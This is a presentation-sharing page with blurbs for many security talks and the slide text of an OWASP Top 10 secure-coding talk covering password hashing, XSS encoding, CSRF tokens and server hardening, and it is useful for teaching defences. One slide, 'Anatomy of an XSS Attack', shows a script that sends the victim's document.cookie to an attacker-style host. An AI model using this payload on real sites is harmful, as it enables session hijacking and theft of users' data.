Caution: This is a dated presentation; uploaded for reference. While the principles remain valid, specifics may have changed.
This presentation was made for software developers in Chandigarh - as a part of the NULL & OWASP Chandigarh Chapter activities.
It covers the basics of secure software development and secure coding using OWASP Top 10 as a broad guide.
"Web Application Security" by Lee Christense at Utah Code Camp in March 2014. Covers SQL injection (SQLi), cross-site scripting (XSS), cross-site request forgery (CSRF), and password hashing.
Preventing Data Breaches: How to Tighten Your Security Stance - Sara Goodison
In this talk, we'll cover the costs and risks of a data breach, plus the dangers of insider threat and shared database credentials.
We'll also discuss what you can do about it. We'll cover the pros, cons, and lingering risks of secrets managers (the "secret zero" problem) plus review a new approach: passwordless database authentication.
New Methods in Automated XSS Detection & Dynamic Exploit Creation - Ken Belva
This slide deck consists of three presentations showing both an overall and a detailed view of the new patent-pending methods that make Cross-Site Scripting (XSS) detection more accurate and faster, as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
Learn how to exploit security vulnerabilities that are commonly found in the arsenal of malicious attackers. We won't simply talk about issues like XSS, CSRF and SQL Injection, but will have live demos showing how hackers exploit these potentially devastating defects using freely available tools. You'll see how to hack a real world open source application and explore bugs in commonly used open source frameworks. We also look at the source code and see how to fix these issues using secure coding principles. We will also discuss best practices that can be used to build security into your SDLC. Java developers and architects will learn how to find and fix security issues in their applications before hackers do.
Let's face it, the web can be a dangerous place. So how do you protect your users and yourself? Tony Amoyal answers that and more as he shows how Rails can help protect against miscreants.
Secure integration of cryptographic software. By modeling the variability in cryptography components, we help application developers configure the cryptography tasks they need. Presented at ONWARD! '15 in Pittsburgh.
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac... - Jakub Kałużny
Big corporations and financial institutions need secure pull printing services which guarantee proper encryption, data access control and accountability. This research aimed to perform a MITM attack on multifunction printers with embedded software from the most popular vendors. The results are staggering: similar vulnerabilities have been found in multiple solutions, allowing the encryption to be broken, any print job to be collected from the server, and printing at others' expense.
A review of the webshells used by bad guys: how they are protected, but also mistakes in their implementation. This talk was presented at the OWASP Belgium Chapter Meeting in May 2017.
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho - CODE BLUE
This talk will show esoteric web application vulnerabilities in detail. These vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items from merchants using PayPal as their payment gateway without actually paying. SQL injections are dead, and I don't care: let's explore the world of null, nil and NULL; NoSQL injections; host header injections that lead to phone call audio interception; PayPal's double spend and Rails' MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert who currently leads the community-driven, Open Source w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS, contributed with SAP research performed at one of his former employers and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and held trainings at many security conferences around the globe, like BlackHat (USA and Europe), SEC-T (Sweden), DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland), CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada), PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
OWASP - the Open Web Application Security Project - is a foundation whose goal is to eliminate application security problems. OWASP operates in the "open source" spirit and provides tools, information and knowledge that help raise the level of application security. During the lecture I will briefly present the OWASP Top 10 in its edition for developers, i.e. the "Top 10 Proactive Controls": the most important recommendations that allow you to avoid key security mistakes.
Think Like a Hacker - Database Attack Vectors - Mark Ginnebaugh
More here: http://bit.ly/2OMTu4
Sudha Iyer of LogLogic and Slavik Markovich of Sentrigo discuss how hackers learn their trade and what you can do to protect your database.
Learn about methods for protecting against each type of attack, including secure coding practices, database hardening methods and deep-scanning database activity monitoring tools.
You will learn:
• How to think like a hacker (including a demonstration of basic hacking)
• SQL injection in depth
• How to avoid SQL injection problems
• User-defined DBMS security policies
• Taking control of SQL injection, buffer overflow and other privilege-escalation attacks
• How to preserve the confidentiality and integrity of your data
• Strategies for monitoring and analyzing database activities without impacting performance
On 7 June 2012, LinkedIn was hacked. More than 6 million LinkedIn passwords were compromised. The really shocking news was not the theft but the fact that the attackers were able to decrypt many of these passwords. Why did it happen? The answer is simple: a bad design of the password security. In this talk I presented how to choose "secure" user passwords and how to store them safely from a programmer's perspective.
This talk has been presented during the MOCA 2012, http://moca.olografix.org/moca2012
Webinar slides: How to Secure MongoDB with ClusterControl - Severalnines
Watch the slides of our webinar on "How to secure MongoDB with ClusterControl" and find out about the essential steps necessary to secure MongoDB and how to verify that your MongoDB instance is safe.
The recent MongoDB ransom hack caused a lot of damage and outages, while it could have been prevented with maybe two or three simple configuration changes. MongoDB offers a lot of security features out of the box; however, they are disabled by default.
In this webinar, we explain which configuration changes are necessary to enable MongoDB’s security features, and how to test if your setup is secure after enablement. We also demonstrate how ClusterControl enables security on default installations. And we cover how to leverage the ClusterControl advisors and the MongoDB Audit Log to constantly scan your environment, and harden your security even more.
AGENDA
What is the MongoDB ransom hack?
What other security threats are valid for MongoDB?
How to enable authentication / authorisation
How to secure MongoDB from ransomware
How to scan your system
ClusterControl MongoDB security advisors
Live Demo
SPEAKER
Art van Scheppingen is a Senior Support Engineer at Severalnines. He's a pragmatic MySQL and database expert with over 15 years' experience in web development. He previously worked at Spil Games as Head of Database Engineering, where he oversaw the whole database environment: from MySQL to Couchbase, Vertica to Hadoop and from Sphinx Search to SOLR. He regularly presents his work and projects at various conferences (Percona Live, FOSDEM) and related meetups.
Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.
Roy Levin, Microsoft
Mathias Scherman, Microsoft
Yotam Livny, Microsoft
As a Cloud Security provider, Azure Security Center collects logs from various services that contain potentially vast amounts of security information. However, parsing them to extract the most information is a hard task.
Artificial Intelligence techniques have proven to perform well for such pattern recognition tasks. In this talk, we will present a novel approach leveraging recent advances in Deep Learning to detect IaaS VMs being compromised, using Windows Security Events.
Nick Anderson, Facebook
Just as Microsoft grows to embrace the open source community more and more, we must use open source tools to help us grow as a community. In this talk we'll explore the various advanced detection techniques we employ at Facebook using osquery for Windows. Specifically, we will examine instrumenting Windows Event Log data, inspecting detailed attack patterns on processes such as path hijacking, and mapping operating system state to detect deviations of a healthy system - all at Facebook scale. Building on these detection capabilities, we will then consider different response features currently available in osquery and how one can extend these capabilities to suit the needs of their own enterprise. By striving to make these advanced detection capabilities more approachable we hope to raise the bar of defenses employed by companies everywhere and encourage the security community to take a more proactive role in developing detection features used to catch advanced exploitation.
HTTP For the Good or the Bad - FSEC Edition - Xavier Mertens
A review of the webshells used by bad guys: how they are protected, but also mistakes in their implementation. This talk was updated and presented at the FSEC conference in Croatia, September 2017.
This study investigates users’ behavior in password utilization. Good password practices are critical to the security of any information system. End users often use weak passwords that are short, simple, and based on personal and meaningful information that can be easily guessed. A survey was conducted among executive MBA students who hold managerial positions. The results of the survey indicate that users practice insecure behaviors in the utilization of passwords. The results support the literature and can be used to guide password management policy.
In a dynamic infrastructure world, let's stop pretending credentials aren't public knowledge in an organization and just assume that they have already been leaked. Now what?
Web security: OWASP project, CSRF threat and solutions - Fabio Lombardi
In a society where we can all see an exponential growth in hacking attacks, this presentation raises awareness of web security vulnerabilities, what web developers can do to protect their web applications and which tools are available to ease the task.
In particular, I'm going to provide an overview of the OWASP top ten vulnerabilities, then focus on the CSRF (Cross-Site Request Forgery) attack, showing how it works, the impacts it can have, and how it is possible to prevent it.
Finally, I will briefly describe the OWASP LAPSE project, a useful Eclipse plugin for detecting vulnerabilities in Java EE applications.
SQL Injection: complete walkthrough (not only) for PHP developers - Krzysztof Kotowicz
Learn what SQL injection is, how to use prepared statements, how to escape, and how to write secure stored procedures. Many PHP projects are covered: PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
In this presentation we will be looking at:
Common threats to the security of your website.
The various attack surfaces of a website; from the server, down the wire to presentation in the client browser.
Simple approaches to mitigating these threats.
Keeping web applications free from malicious attack is an arms race. From brute-force attacks against your server through to browser-based attacks on your pages once delivered (e.g. XSS, clickjacking, cross-site request forgery (CSRF)), there are many ways in which your web site is susceptible to attack.
Fortunately, there are several established countermeasures that are simple (if rarely) implemented and effective in mitigating such threats.
We will look at the various modes of attack, review some real-world examples and see how countermeasures can be put in place.
The presentation is aimed at anyone responsible for delivering information over the web, regardless of whether they are responsible for the hosting and administration of their web site. It covers measures you can implement yourself and measures you may wish to have supported by your hosting provider.
Topics covered:
Server hardening through the use of firewalls,
TLS/SSL implementation to protect delivery across the wire and
Secure response headers and Content Security Policies to protect your page once received by the user's browser.
The top two attack vectors for malware are email and web browsers. Watering-hole attacks conceal malware on member-based sites and phishing scams can target individuals with personal details. This PPT describes a different security approach to protect against these threats while achieving business growth, efficiency and lowered expenses. The presentation features Cisco Email, Web and Cloud Web Security and covers basic features, offers, benefits, newest features and product integrations. Watch the webinar: http://cs.co/9004BGqvy
We cannot "firewall" or "patch" our way to secure websites. In the past, security professionals thought firewalls, Secure Sockets Layer (SSL), patching, and privacy policies were enough. Today, however, these methods are outdated and ineffective, as attacks on prominent, well-protected websites are occurring every day. Almost every organization in the world has something in common: they have had websites compromised in some way. No company or industry is immune. Programmers need to learn to build websites differently. This talk will review the top coding techniques developers need to master in order to build a low-risk, high-security web application.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend JavaScript code. We'll also look at how you can build code that detects and blocks intrusion attempts, and a bunch of other tips and tricks to make sure your customer data stays secure.
Mugdha and Amish from OSSCube present on PHP security at OSSCamp, organized by OSSCube - a global Open Source enterprise for Open Source Solutions.
The security of an application is a continuous struggle between solid proactive controls and quality in the SDLC versus human weakness and resource restrictions. As the pentester's experience confirms, unfortunately even in high-risk (e.g. banking) applications developed by recognized vendors, the latter often wins, and we end up with critical vulnerabilities.
One of the primary reasons is the lack of mechanisms enforcing secure code by default, as opposed to manually adding security to each function. Whenever the secure configuration is not the default, there will almost inevitably be bugs, especially in complex systems. I will pinpoint what should be taken into consideration in the architecture and design process of the application. I will show solutions that impose security in ways that are difficult for creative developers to circumvent unintentionally. I will also share with the audience the pentester's (= attacker's) perspective, and a few clever tricks that made the pentest (= attack) painful, or just rendered the scenarios irrelevant.
Similar to Application Security around OWASP Top 10 (20)
Quarkus Hidden and Forbidden Extensions - Max Andersen
Quarkus has a vast extension ecosystem and is known for its subsonic and subatomic feature set. Some of these features are not as well known, and some extensions are less talked about, but that does not make them less interesting - quite the opposite.
Come join this talk to see some tips and tricks for using Quarkus and some of the lesser known features, extensions and development techniques.
GraphSummit Paris - The art of the possible with Graph Technology - Neo4j
Sudhir Hasbe, Chief Product Officer, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Globus Compute with IRI Workflows - GlobusWorld 2024 - Globus
As part of the DOE Integrated Research Infrastructure (IRI) program, NERSC at Lawrence Berkeley National Lab and ALCF at Argonne National Lab are working closely with General Atomics on accelerating the computing requirements of the DIII-D experiment. As part of the work, the team is investigating ways to speed up the time to solution for many different parts of the DIII-D workflow, including how they run jobs on HPC systems. One of these routes is looking at Globus Compute as a way to replace the current method for managing tasks, and we describe a brief proof of concept showing how Globus Compute could help to schedule jobs and be a tool to connect compute at different facilities.
Code reviews are vital for ensuring good code quality. They serve as one of our last lines of defense against bugs and subpar code reaching production.
Yet, they often turn into annoying tasks riddled with frustration, hostility, unclear feedback and lack of standards. How can we improve this crucial process?
In this session we will cover:
- The Art of Effective Code Reviews
- Streamlining the Review Process
- Elevating Reviews with Automated Tools
By the end of this presentation, you'll have the knowledge on how to organize and improve your code review process.
Enhancing Research Orchestration Capabilities at ORNL.pdf - Globus
Cross-facility research orchestration comes with ever-changing constraints regarding the availability and suitability of various compute and data resources. In short, a flexible data and processing fabric is needed to enable the dynamic redirection of data and compute tasks throughout the lifecycle of an experiment. In this talk, we illustrate how we easily leveraged Globus services to instrument the ACE research testbed at the Oak Ridge Leadership Computing Facility with flexible data and task orchestration capabilities.
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv... - Shahin Sheidaei
Games are powerful teaching tools, fostering hands-on engagement and fun. But they require careful consideration to succeed. Join me to explore factors in running and selecting games, ensuring they serve as effective teaching tools. Learn to maintain focus on learning objectives while playing, and how to measure the ROI of gaming in education. Discover strategies for pitching gaming to leadership. This session offers insights, tips, and examples for coaches, team leads, and enterprise leaders seeking to teach from simple to complex concepts.
Top 7 Unique WhatsApp API Benefits | Saudi ArabiaYara Milbes
Discover the transformative power of the WhatsApp API in our latest SlideShare presentation, "Top 7 Unique WhatsApp API Benefits." In today's fast-paced digital era, effective communication is crucial for both personal and professional success. Whether you're a small business looking to enhance customer interactions or an individual seeking seamless communication with loved ones, the WhatsApp API offers robust capabilities that can significantly elevate your experience.
In this presentation, we delve into the top 7 distinctive benefits of the WhatsApp API, provided by the leading WhatsApp API service provider in Saudi Arabia. Learn how to streamline customer support, automate notifications, leverage rich media messaging, run scalable marketing campaigns, integrate secure payments, synchronize with CRM systems, and ensure enhanced security and privacy.
Globus Connect Server Deep Dive - GlobusWorld 2024Globus
We explore the Globus Connect Server (GCS) architecture and experiment with advanced configuration options and use cases. This content is targeted at system administrators who are familiar with GCS and currently operate—or are planning to operate—broader deployments at their institution.
Software Engineering, Software Consulting, Tech Lead, Spring Boot, Spring Cloud, Spring Core, Spring JDBC, Spring Transaction, Spring MVC, OpenShift Cloud Platform, Kafka, REST, SOAP, LLD & HLD.
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteGoogle
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
👉👉 Click Here To Get More Info 👇👇
https://sumonreview.com/ai-pilot-review/
AI Pilot Review: Key Features
✅Deploy AI expert bots in Any Niche With Just A Click
✅With one keyword, generate complete funnels, websites, landing pages, and more.
✅More than 85 AI features are included in the AI pilot.
✅No setup or configuration; use your voice (like Siri) to do whatever you want.
✅You Can Use AI Pilot To Create your version of AI Pilot And Charge People For It…
✅ZERO Manual Work With AI Pilot. Never write, Design, Or Code Again.
✅ZERO Limits On Features Or Usages
✅Use Our AI-powered Traffic To Get Hundreds Of Customers
✅No Complicated Setup: Get Up And Running In 2 Minutes
✅99.99% Up-Time Guaranteed
✅30 Days Money-Back Guarantee
✅ZERO Upfront Cost
See My Other Reviews Article:
(1) TubeTrivia AI Review: https://sumonreview.com/tubetrivia-ai-review
(2) SocioWave Review: https://sumonreview.com/sociowave-review
(3) AI Partner & Profit Review: https://sumonreview.com/ai-partner-profit-review
(4) AI Ebook Suite Review: https://sumonreview.com/ai-ebook-suite-review
In software engineering, the right architecture is essential for robust, scalable platforms. Wix has undergone a pivotal shift from event sourcing to a CRUD-based model for its microservices. This talk will chart the course of this pivotal journey.
Event sourcing, which records state changes as immutable events, provided robust auditing and "time travel" debugging for Wix Stores' microservices. Despite its benefits, the complexity it introduced in state management slowed development. Wix responded by adopting a simpler, unified CRUD model. This talk will explore the challenges of event sourcing and the advantages of Wix's new "CRUD on steroids" approach, which streamlines API integration and domain event management while preserving data integrity and system resilience.
Participants will gain valuable insights into Wix's strategies for ensuring atomicity in database updates and event production, as well as caching, materialization, and performance optimization techniques within a distributed system.
Join us to discover how Wix has mastered the art of balancing simplicity and extensibility, and learn how the re-adoption of the modest CRUD has turbocharged their development velocity, resilience, and scalability in a high-growth environment.
Developing Distributed High-performance Computing Capabilities of an Open Sci...Globus
COVID-19 had an unprecedented impact on scientific collaboration. The pandemic and its broad response from the scientific community has forged new relationships among public health practitioners, mathematical modelers, and scientific computing specialists, while revealing critical gaps in exploiting advanced computing systems to support urgent decision making. Informed by our team’s work in applying high-performance computing in support of public health decision makers during the COVID-19 pandemic, we present how Globus technologies are enabling the development of an open science platform for robust epidemic analysis, with the goal of collaborative, secure, distributed, on-demand, and fast time-to-solution analyses to support public health.
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...informapgpstrackings
Keep tabs on your field staff effortlessly with Informap Technology Centre LLC. Real-time tracking, task assignment, and smart features for efficient management. Request a live demo today!
For more details, visit us : https://informapuae.com/field-staff-tracking/
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxrickgrimesss22
Discover the essential features to incorporate in your Winzo clone app to boost business growth, enhance user engagement, and drive revenue. Learn how to create a compelling gaming experience that stands out in the competitive market.
12. Disable Browser Autocomplete
<form AUTOCOMPLETE="off">
<input AUTOCOMPLETE="off">
Only send passwords over HTTPS POST
Do not display passwords in browser
Input type=password
Store password based on need
Use a salt (de-duplication)
SCRYPT/PBKDF2 (slow, performance hit, easy)
HMAC (requires good key storage, tough)
Password Defenses
13. 1) Do not limit the type of characters or length* of user password
• Limiting passwords to protect against injection is doomed to failure
• Use proper encoder and other defenses described instead
Password Storage
14. 2) Use a cryptographically strong credential-specific salt
• Protect ([salt] + [password]);
• Use a 32 char / 64 char salt (may depend on protection function)
• Do not depend on hiding / splitting / otherwise obscuring the salt
Password Storage
15. 3) Impose difficult verification on attacker ONLY
• HMAC-SHA256 ([private key], [salt] + [password])
• Protect the key as any private key
• Store key outside the credential store
• Improvement over (solely) salted schemes; relies on proper key creation & management
Password Storage
16. 4) Impose difficult verification on both (impacts attacker more than defender)
• pbkdf2([salt] + [password], c=10,000,000);
• PBKDF2 when FIPS certification or enterprise support on many platforms required
• Scrypt when resisting hardware accelerated attacks is more important
Password Storage
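Slides 13 to 16 put together as one added example (my code, not the presenter's): a fresh per-credential salt, PBKDF2 so each guess costs attacker and defender alike, then an HMAC under a key that lives outside the credential store, with constant-time verification. The server key and the iteration count are placeholders to be set per deployment.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Optional

# Assumed: the HMAC key is loaded from outside the credential store (environment,
# KMS, HSM). This constant is a constructed stand-in for the demonstration only.
DEMO_SERVER_KEY = bytes.fromhex(
    "00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff")

# Work factor: tune per deployment; the slide's c=10,000,000 is far above this.
DEFAULT_ITERATIONS = 600_000


def hash_password(password: str, *, server_key: bytes = DEMO_SERVER_KEY,
                  iterations: int = DEFAULT_ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: pbkdf2_sha256$<iterations>$<salt>$<tag>.

    Step 1: the password is taken as-is, any characters, any length.
    Step 2: a fresh 32-byte credential-specific salt, stored in the clear.
    Step 4: PBKDF2-HMAC-SHA256 makes each guess cost the same for attacker and defender.
    Step 3: the derived key is then MACed under a key kept outside the credential
    store, so a dumped table cannot be attacked offline without that key as well.
    """
    if salt is None:
        salt = secrets.token_bytes(32)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    tag = hmac.new(server_key, salt + dk, hashlib.sha256).digest()
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(tag).decode("ascii"),
    )


def verify_password(password: str, record: str, *,
                    server_key: bytes = DEMO_SERVER_KEY) -> bool:
    """Recompute the record for the candidate password and compare in constant time."""
    try:
        algo, iterations, salt_b64, _tag = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        expected = hash_password(password, server_key=server_key,
                                 iterations=int(iterations),
                                 salt=base64.b64decode(salt_b64, validate=True))
        # Constant-time comparison: do not leak where the first differing byte is.
        return hmac.compare_digest(expected.encode("ascii"), record.encode("ascii"))
    except (ValueError, TypeError):
        return False
```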
17. Basic MFA Considerations
• Where do you send the token?
– Email (worst – yet, better than none!)
– SMS (ok)
– Mobile native app (good)
– Dedicated token (great)
– Printed Tokens (interesting)
• How do you handle thick clients?
– Email services, for example
– Dedicated and strong per-app passwords
18. Basic MFA Considerations
• How do you handle unavailable MFA devices?
– Printed back-up codes
– Fallback mechanism (like email)
– Call-in center
• How do you handle mobile apps?
– When is MFA not useful in mobile app scenarios?
19. “Forgot Password” design
• Require identity questions
– Last name, account number, email, DOB
– Enforce lockout policy
• Ask one or more good security questions
– https://www.owasp.org/index.php/Choosing_and_Using_Security_Questions_Cheat_Sheet
• Send the user a randomly generated token via out-of-band email, SMS or hardware / software token generator
• Verify code in same web session
– Enforce lockout policy
• Change password
– Enforce password policy
22. <script>
var badURL = 'https://evileviljim.com/somesite/data=' + document.cookie;
var img = new Image();
img.src = badURL;
</script>
<script>document.body.innerHTML='<blink>CYBER IS COOL</blink>';</script>
Anatomy of an XSS Attack
23. Impact of XSS
– Session Hijacking
– Site Defacement
– Network Scanning
– Undermining CSRF Defenses
– Site Redirection/Phishing
– Load of Remotely Hosted Scripts
– Data Theft
– Keystroke Logging
– Attackers using XSS more frequently
24. XSS Prevention (.NET)
• WebForms/WebForms View Engine <%=Server.HtmlEncode(data)%>
• WebForms v4.0+ <%: data %>
• MVC3+ Razor View Engine @data
• Data Binding in Web Forms v4 and below <%#Server.HtmlEncode(Eval("property"))%>
• Data Binding in v4.5 <%#: Item.Property %>
• Better: ASP.Net 3.5 and below use AntiXss library directly
Microsoft.Security.Application.Encoder.HtmlEncode(message)
25. XSS Prevention (.NET)
• ASP.Net 4 (WebForms and MVC)
<httpRuntime encoderType="Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary"/>
• ASP.Net 4.5 (AntiXss included in this version!)
<httpRuntime encoderType="System.Web.Security.AntiXss.AntiXssEncoder, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
• JSON (MVC) Json.Encode(Model)
• JavaScript encoding using AntiXss Encoder.JavaScriptEncode(Model.FirstName)
28. • No third party libraries or configuration necessary
• This code was designed for high-availability/high-performance encoding functionality
• Simple drop-in encoding functionality
• Performance, ESAPI integration
• More complete API (uri and uri component encoding, etc) in some regards
• Java 1.5+
• Last updated January 30, 2014 (version 1.1.1)
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
OWASP Java Encoder Project
29. Web Page built in Java JSP is vulnerable to XSS
OWASP Java Encoder Project
Problem
Solution
1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" />
2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %></textarea>
3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">
click me
</button>
4) <script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(message) %>";
alert(msg);
</script>
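The four contexts from the slide, as an added Python re-implementation that is mine and not the OWASP Java Encoder: the point it shows is that each output location needs its own encoder, and that the event-handler case layers two of them because the browser HTML-decodes the attribute before the JavaScript runs.

```python
import html

# Escapes for a JavaScript string literal; '/' is escaped so "</script>" can never
# appear in the output, and U+2028/U+2029 because they terminate JS lines.
_JS_ESCAPES = {
    "\\": "\\\\", '"': '\\"', "'": "\\'", "/": "\\/",
    "<": "\\x3c", ">": "\\x3e", "&": "\\x26",
    "\n": "\\n", "\r": "\\r", "\t": "\\t",
    "\u2028": "\\u2028", "\u2029": "\\u2029",
}


def for_html_content(s: str) -> str:
    """Text between tags (cf. Encode.forHtmlContent): & < > " ' become entities."""
    return html.escape(s, quote=True)


def for_html_attribute(s: str) -> str:
    """Value of a quoted attribute (cf. Encode.forHtmlAttribute); the template must quote it."""
    return html.escape(s, quote=True)


def for_javascript(s: str) -> str:
    """Inside a JS string literal in a <script> block (cf. Encode.forJavaScriptBlock)."""
    out = []
    for ch in s:
        if ch in _JS_ESCAPES:
            out.append(_JS_ESCAPES[ch])
        elif ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append("\\x%02x" % ord(ch))       # remaining control characters
        else:
            out.append(ch)
    return "".join(out)


def for_javascript_attribute(s: str) -> str:
    """JS string inside an HTML event-handler attribute (cf. Encode.forJavaScriptAttribute).
    The browser HTML-decodes the attribute first and runs the JS second, so encode in
    the reverse order: JS escaping first, then HTML attribute escaping on top."""
    return for_html_attribute(for_javascript(s))


def render(data_value: str, text_value: str, alert_msg: str, message: str) -> str:
    """The four JSP snippets from the slide, each rendered with its context's encoder."""
    return (
        '<input type="text" name="data" value="%s" />\n' % for_html_attribute(data_value)
        + '<textarea name="text">%s</textarea>\n' % for_html_content(text_value)
        + "<button onclick=\"alert('%s');\">click me</button>\n" % for_javascript_attribute(alert_msg)
        + '<script type="text/javascript">\nvar msg = "%s";\nalert(msg);\n</script>' % for_javascript(message)
    )
```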
33. • Written in Java; lets you include HTML authored by third-parties in your web application while protecting against XSS
• Has an extensive test suite, and has undergone adversarial security review
https://code.google.com/p/owasp-java-html-sanitizer/wiki/AttackReviewGroundRules
• Very easy to use
• Allows for simple programmatic POSITIVE policy configuration. No XML config.
• << Caja project (Google)
• High performance & low memory utilization
OWASP HTML Sanitizer Project
https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
34. Web Page is vulnerable to XSS because of untrusted HTML
PolicyFactory policy = new HtmlPolicyBuilder()
    .allowElements("a")
    .allowUrlProtocols("https")
    .allowAttributes("href").onElements("a")
    .requireRelNofollowOnLinks()
    .build();
String safeHTML = policy.sanitize(untrustedHTML);
Solving real world problems (using OWASP HTML Sanitizer)
Problem
Solution
35. • Pure JavaScript
– http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer
• Python
– https://pypi.python.org/pypi/bleach
• PHP
– http://htmlpurifier.org/
– http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/
• .NET
– AntiXSS.getSafeHTML/getSafeHTMLFragment
– http://htmlagilitypack.codeplex.com/
• Ruby on Rails
– http://api.rubyonrails.org/classes/HTML.html
Other HTML Sanitizers
36. • JavaScript encode and delimit untrusted data as quoted strings
• Avoid use of HTML rendering methods like innerHTML
– If you must do this, then sanitize untrusted HTML first
• Avoid code execution contexts
– eval(), setTimeout() or event handlers
• When possible, treat untrusted data as display text only
• To build dynamic interfaces, use
document.createElement("…"),
element.setAttribute("…","value"),
element.appendChild(…)
• Parse JSON with JSON.parse in the browser
DOM-based XSS Defense
37. SAFE use of JQuery
$('#element').text(UNTRUSTED DATA);
UNSAFE use of JQuery
$('#element').html(UNTRUSTED DATA);
41. We need to change the method signature (the ID is now a GUID), then translate it
back to the original, direct reference before going any further:
public Customer GetCustomer(Guid indirectId)
{
    var customerId = IndirectReferenceMap.GetDirectReference(indirectId);
    // ... continue with the direct customerId exactly as before
}
Insecure Direct Object Reference
43. Security Misconfiguration
Is it really the developers' work? Or the sysadmins?
If the developers don't know, how will the application
security design be complete?
What about configuring in Dev & Testing environments?
44. • Harden the Operating System
– BIOS & grub passwords; secure physical access
– Use multiple partitions (not default install); use options like ro, nosuid, noexec, nodev, --make-runbindable ...
– Remove all unnecessary packages & drivers (e.g., do you really need Xorg? All those fonts?)
– Lockdown others (cron, USB detect, IPv6, ctrl-alt-del, ...)
– SSH password-less login with SSH keygen
– Enable ufw / iptables / … and a HIDS >> turn on remote logging
– Oh yeah, regular patches & updates (wait!)
– Regular backups!
Hardening the servers (general)
51. • Steps:
– Go to "C:\Windows\Microsoft.NET\Framework\v4.0.30319" using command prompt.
aspnet_regiis.exe -pe "connectionStrings" "<path of Web.Config>"
• Decrypting the web.config
– Go to the same path
aspnet_regiis.exe -pd "connectionStrings" "<path of Web.Config>"
Encrypting web.config
57.
How many are already “logged in”?
Waiting to update your status, accept your credit card or email your friends
What if another tab manages to send a request?
What about others with the “remember me” checkbox?
No need for tab to be open... just send a request and they'll happily accept!
How many tabs on your browser?
62. To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper method:
@using (Html.BeginForm("Manage", "Account"))
{
    @Html.AntiForgeryToken()
}
This method adds the hidden form field and also sets the cookie token.
<script>
@functions
{
    public string TokenHeaderValue()
    {
        string cookieToken, formToken;
        AntiForgery.GetTokens(null, out cookieToken, out formToken);
        return cookieToken + ":" + formToken;
    }
}
$.ajax("api/values", {
    type: "post",
    contentType: "application/json",
    data: { },  // JSON data goes here
    dataType: "json",
    headers: { 'RequestVerificationToken': '@TokenHeaderValue()' }
});
</script>
Anti-Forgery Tokens
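The cookie/form token pair behind the slide, as an added example that is not ASP.NET's code: a random cookie half the attacker's page cannot read, a form half that is a MAC binding that cookie half to the logged-in user, and the `cookie:form` header check for the AJAX case. The key value and the cookie/field name are assumptions for the demonstration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Tuple

# Assumed: a server-side secret that never reaches the page or a cookie (constructed value).
DEMO_CSRF_KEY = b"constructed-demo-key-rotate-me"
# Assumed cookie and hidden-field name used by both halves of the check.
COOKIE_NAME = "__RequestVerificationToken"


def _mac(key: bytes, cookie_token: str, session_user: str) -> str:
    # Binds the random cookie token to the authenticated user.
    msg = ("%s\0%s" % (cookie_token, session_user)).encode("utf-8")
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def issue_tokens(session_user: str, key: bytes = DEMO_CSRF_KEY) -> Tuple[str, str]:
    """Return (cookie_token, form_token), the pair the slide's helper emits.

    cookie_token goes into an HttpOnly cookie that a third-party page can never read;
    form_token goes into the hidden field (or the request header for AJAX).
    """
    cookie_token = secrets.token_urlsafe(32)
    return cookie_token, _mac(key, cookie_token, session_user)


def tokens_valid(cookie_token: str, form_token: str, session_user: str,
                 key: bytes = DEMO_CSRF_KEY) -> bool:
    """Server side: both halves present, and the form half is the MAC of the cookie half."""
    if not cookie_token or not form_token:
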